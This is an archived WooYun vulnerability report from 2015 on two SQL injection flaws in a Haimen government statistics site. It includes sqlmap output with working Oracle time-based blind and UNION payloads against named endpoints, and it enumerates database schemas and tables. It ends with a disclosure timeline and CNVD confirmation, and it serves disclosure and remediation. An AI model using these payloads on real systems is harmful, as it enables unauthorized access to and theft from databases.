乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-02: 细节已通知厂商并且等待厂商处理中 2015-07-06: 厂商已经确认,细节仅向厂商公开 2015-07-16: 细节向核心白帽子及相关领域专家公开 2015-07-26: 细节向普通白帽子公开 2015-08-05: 细节向实习白帽子公开 2015-08-20: 细节向公众公开
RT
两处SQL注入:第一处:
http://tjdata.haimen.gov.cn/chart_singleDataList.do?type=indexpost参数change=0&ids=&ndSearchEnd=-1&ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd&zbid=9D45DAB40C074E80B70C524A37498CC8ndSearchEnd参数存在注入
第二处:
http://tjdata.haimen.gov.cn/chart_economicDataList.do?type=indexpost参数change=0&dqlx=hms&fid=F737524D35DF4F0AA3AE2D142FBE0CFC&ids=&ndSearchEnd=-1&ndSearchStart=&nowPage=1&pageCount=24&pageEnd=0&sblx=jd&sblxsc=ndndSearchEnd参数存在注入ndSearchEnndSearchEnd参数存在注入
sqlmap证明下:
sqlmap identified the following injection points with a total of 1231 HTTP(s) requests:---Parameter: ndSearchEnd (POST) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: change=0&ids=&ndSearchEnd=-1' AND 7329=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(117)||CHR(100)||CHR(110),5) AND 'WEbm' LIKE 'WEbm&ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd&zbid=9D45DAB40C074E80B70C524A37498CC8 Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: change=0&ids=&ndSearchEnd=-1' UNION ALL SELECT CHR(113)||CHR(107)||CHR(118)||CHR(112)||CHR(113)||CHR(70)||CHR(74)||CHR(111)||CHR(120)||CHR(82)||CHR(102)||CHR(100)||CHR(80)||CHR(84)||CHR(72)||CHR(113)||CHR(118)||CHR(118)||CHR(106)||CHR(113),NULL FROM DUAL-- &ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd&zbid=9D45DAB40C074E80B70C524A37498CC8 Vector: UNION ALL SELECT [QUERY],NULL FROM DUAL-- ---web application technology: JSPback-end DBMS: Oraclecurrent user: 'HMDATA'current schema (equivalent to database on Oracle): 'HMDATA'current user is DBA: Trueavailable databases [24]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] HMDATA[*] HMDATA_TEST[*] HR[*] IX[*] MDSYS[*] NTDATA[*] OE[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PM[*] SCOTT[*] SH[*] SYS[*] SYSMAN[*] SYSTEM[*] WK_TEST[*] WKSYS[*] WMSYS[*] XDBsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: ndSearchEnd (POST) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: change=0&ids=&ndSearchEnd=-1' AND 7329=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(117)||CHR(100)||CHR(110),5) AND 'WEbm' LIKE 'WEbm&ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd&zbid=9D45DAB40C074E80B70C524A37498CC8 Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: change=0&ids=&ndSearchEnd=-1' UNION ALL SELECT CHR(113)||CHR(107)||CHR(118)||CHR(112)||CHR(113)||CHR(70)||CHR(74)||CHR(111)||CHR(120)||CHR(82)||CHR(102)||CHR(100)||CHR(80)||CHR(84)||CHR(72)||CHR(113)||CHR(118)||CHR(118)||CHR(106)||CHR(113),NULL FROM DUAL-- &ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd&zbid=9D45DAB40C074E80B70C524A37498CC8 Vector: UNION ALL SELECT [QUERY],NULL FROM DUAL-- ---web application technology: JSPback-end DBMS: OracleDatabase: HMDATA[36 tables]+--------------------------------+| BIN$/OJ59APMQYYVCQD4R9CYHQ==$0 || BIN$3ALHS3TQTQOHN8DVUAZ0GA==$0 || BIN$3UEQGJ16SN6O9WXXFS5TEQ==$0 || BIN$4PC5VRLUQUEKNRIOIAAXVW==$0 || BIN$8GISAK8YS3YQDY+G82LT8G==$0 || BIN$BI97240CSNM4I2DGKEVECQ==$0 || BIN$BZU1VTUGQKECVMBWXYQQQA==$0 || BIN$C8P9KDFTQRI9THM2E9B8QW==$0 || BIN$DA2WQDW8QWQDG+3YOKUIBG==$0 || BIN$EC7HJVEFQFS8KOFZAJ13ZG==$0 || BIN$F4ZJEALCQHYVP49YAPV/DW==$0 || BIN$FZOERHRLROAHRH97S9UKTA==$0 || BIN$GQJ3SHJHSBGGCA8L9IQFZG==$0 || BIN$HVDM3GJSS5YLPT37E/75ZW==$0 || BIN$HVQFNYBMRFAW60FW7P+E2G==$0 || BIN$JKXK6GNXQY690QMOXUC28W==$0 || BIN$KBBOZPLVRLC0L29GGO6/WA==$0 || BIN$KUKFYGDZRJGMKJ6IZPEPMQ==$0 || BIN$LD6YNGG5TKOKIGC+CUB/8Q==$0 || BIN$LKVCXPZRRWUK1AI0U9MU8A==$0 || BIN$LQEYNQD/QE6JXWOW/YCLFA==$0 || BIN$M71PKD8ITLQVBO+4K/TLPG==$0 || BIN$NMWXBK95RV66HL5FXDLRQG==$0 || BIN$NXTJK3IOQUKROLHVG9INXQ==$0 || BIN$Q+6OUM8XROWG9V9R1FZGXA==$0 || BIN$QHHQ4C6GROKUUBSA0VOH8Q==$0 || BIN$QPTY2WTORS6Z1G3C5BO2UQ==$0 || BIN$QSDI3O4LTEKWOMB3BBKHTW==$0 || BIN$RZLQN410Q7KITYI2AJHO/A==$0 || BIN$S6YUE2GRQW+F2SBQUUV86A==$0 || BIN$SSB0Q8FDTJWE79RTNRT/4A==$0 || BIN$T8YAVG71S9ODKSFRVM0PLW==$0 || BIN$UQ/MBWKNQUMVOKZP6ACVVA==$0 || BIN$URUCNEVWQTEZCAMJ9BGBGA==$0 || BIN$WICPQF2PQ1+OK1JHBEQLPQ==$0 || BIN$WWPW0DQQTXO52H8MBAVWZW==$0 |+--------------------------------+
参数过滤
危害等级:高
漏洞Rank:10
确认时间:2015-07-06 18:52
CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。
暂无